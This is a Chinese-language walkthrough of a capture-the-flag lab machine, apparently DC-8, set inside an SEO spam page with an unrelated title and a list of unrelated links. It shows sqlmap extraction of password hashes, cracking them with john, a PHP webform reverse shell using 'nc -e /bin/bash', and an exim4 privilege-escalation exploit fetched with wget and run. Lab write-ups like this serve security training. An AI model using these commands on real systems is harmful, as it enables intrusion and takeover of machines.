当前位置: 首页 > news >正文

怎样学做网站泰州百度关键词优化

怎样学做网站,泰州百度关键词优化,黑龙江省住房和建设厅网站,有哪些可以免费推广的网站期末倒计时一周,发完这篇就要好好复习期末了,【许愿】 1.信息查询 1.1.Ip arp-scan -l 192.168.220.138 1.2.扫描端口 nmap -T4 -A -p- 192.168.220.138 接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可…

期末倒计时一周,发完这篇就要好好复习期末了,【许愿】

1.信息查询

1.1.Ip

arp-scan  -l

192.168.220.138

1.2.扫描端口

nmap -T4  -A  -p-  192.168.220.138

接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可能会存在 sql 注入漏洞

验证一下 sql 注入是否真的存在,随机给一个不存在的值 x,观察是否会报 sql 的错误信息,如果报了,说明存在 sql 注入

接下来就可以直接使用 sqlmap 进行攻击

sqlmap  -u  "http://192.168.220.138/?nid=1"  --current-db

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  --tables

获取当前数据库中的所有表,我们想要查看用户的信息可以进行登录,需要使用 users 表

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' --columns

获取出当前 users 表的字段,接下来获取值

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' -C 'name,pass'  --dump

获取当前的密码,但是密码加密了,接下来需使用 john --show 查看解密

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

vim dc8.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写进去然后保存

爆破密码

john dc8.txt

爆破出来的密码: turtle

可以尝试远程连接,但是不好使

1.3.扫描目录

dirsearch -u 192.168.220.138 -e* -i 200

发现了有/user/login 这个页面,接下来就直接访问,使用上面账号进行登录,发现只有 john 能登录成功

接下来需要找突破口,在 webform 中有新的发现

2. shell 反弹

选择 form setting,然后写入 shell 反弹脚本

<h1>xxxx</h1><?phpsystem("nc -e /bin/bash 192.168.126.138 7777");?>

注意选php

点击保存

然后需要写一些信息来进行提交

反弹成功,并设置python交互

使用 python 命令行脚本

python -c 'import pty;pty.spawn("/bin/bash")'

    3.提权

    然后接下来要做两件事情

    1. 进入到 home 目录,发现无任何价值信息

    2.sudo -l进行提权,发现不好使,接下来使用 suid 方式进行提权

    find / -user root -perm -u=s 2>/dev/null

    发现 exim4 在使用时具有 root 权限

    exim 是一个邮件传输的代理,用于在电子邮件服务器之间进行邮件交换和路由。

    4.发现exim的提权方式

    查看 exim4 的版本

    exim4  --version

    可以搜索这个版本的漏洞

    searchsploit exim

    搜索 46996 这个文件

    searchsploit  -p    linux/local/46996.sh

    接下来复制一份到本地,然后传递到靶机上

    cp  /usr/share/exploitdb/exploits/linux/local/46996.sh   46996.sh

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    在靶机中先切换到/tmp.然后在进行 sh 文件的下载

    查看一下自己虚拟机的ip

    192.168.220.146

    ​
    cd  /tmpwget http://192.168.220.146:8888/46996.sh​

    给当前脚本一个执行权限

    chmod  777  46996.sh

    查看这个脚本内容,发现有两种提权方式

    ./46996.sh -m  netcat

    最后

    cd  /rootlscat flag.txt

    http://www.hkea.cn/news/341200/

    相关文章:

  1. 网站后台地址一般是在线seo优化工具
  2. 海曙区住房和建设局网站备案域名
  3. 网站建设硬件环境志鸿优化设计答案
  4. 网页游戏网址推荐宁波网站推广网站优化
  5. 福建就福建省住房与城乡建设厅网站高端网站建设企业
  6. 网站如何做seo规划app怎么开发出来的
  7. 吴江住房和城乡建设局官方网站产品软文是什么
  8. 公司网站制作设谷歌seo是什么职业
  9. 北京品牌高端网站建设公司燕郊今日头条
  10. 网站制作公司徐州宁波网站seo哪家好
  11. 做网站基本费用大概需要多少全媒体运营师报考官网在哪里
  12. 网站建设款属于什么科目营业推广策划
  13. 建设网站查证书网络广告有哪些形式
  14. 分布式网站开发网络销售平台排名
  15. 网站建设模板购买品牌seo培训
  16. 深圳网站建设 cms网站推广交换链接
  17. 标准物质网站建设5118站长工具箱
  18. 做一个能注册用户的网站网络推广费用大概价格
  19. 网站建设评价东莞谷歌推广
  20. php网站后台进不去百度推广入口官网
  21. 个人网站一键生成免费推广网站有哪些
  22. 厦门做网站设计电商seo优化
  23. wordpress视频点播seo技术是干什么的
  24. 网站推广是怎么做的网络营销专业如何
  25. 平面设计线上兼职上海网站seo
  26. 个性化网站定制价格今日热点
  27. 做网站的艰辛免费个人网站申请
  28. 网站改版需要多久网站设计与制作毕业论文范文
  29. 深圳横岗网站建设网站建设的推广渠道
  30. 有没有什么网站免费做名片2023年新闻小学生摘抄